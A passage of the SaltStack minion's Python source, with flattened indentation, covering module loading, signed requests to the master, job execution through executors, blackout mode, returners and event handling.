'modules_max_memory set, enforcing a maximum of %s',
self.opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts, proxy=proxy)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions, proxy=proxy)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
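# Note on the signing above: when 'minion_sign_messages' is enabled, the
# payload is msgpack-serialized and signed with the minion's private key
# (pki_dir/minion.pem); the signature travels in load['sig'] so the master
# can verify it. The async variant below does the same before sending.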
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
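# For orientation, the decoded job payload handled here is a dict shaped
# roughly like this (an illustrative example, not a schema):
#
#   {'jid': '20190101000000000000', 'fun': 'test.ping', 'arg': [],
#    'tgt': '*', 'tgt_type': 'glob', 'user': 'root', 'ret': ''}
#
# 'fun' may also be a list/tuple for multi-function jobs (see
# _thread_multi_return below).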
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance reference to allow for socket communication on
# Windows. You can't pickle functions, and thus Python needs to be able
# to reconstruct the reference on the other side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
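# Execution flows through an "executor" chain resolved below: the job data,
# the minion instance, or the config may provide 'module_executors', falling
# back to ['direct_call']. Each entry maps to '<name>.execute' in
# self.executors, and the first one returning a non-None value wins.
# Illustrative config (executor names are examples; 'direct_call' is the
# default):
#
#   module_executors:
#     - splay
#     - direct_call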
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func'.format(executor) in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been converted to a comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
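# The load sent back to the master is, roughly (illustrative values):
#
#   {'cmd': '_return', 'id': 'minion-id', 'jid': '2019...', 'fun': 'test.ping',
#    'return': True, 'retcode': 0, 'success': True, 'out': 'txt'}
#
# For syndics (ret_cmd='_syndic_return') the result keys are nested under
# 'return' instead, as built below.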
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
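# The event data consumed here looks roughly like this (illustrative):
#
#   {'environ': {'HTTP_PROXY': 'http://proxy:3128'},
#    'false_unsets': False,   # if True, a False value unsets the variable
#    'clear_all': False}      # if True, wipe the environment before applying 'environ'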
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('beacons_refresh'):
self.beacons_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, ignore it
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not my master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' in failback event while connected to \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default value of '0' is
# overloaded to mean 'disable the job', but when salt detects a timeout it
# still needs to set up these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
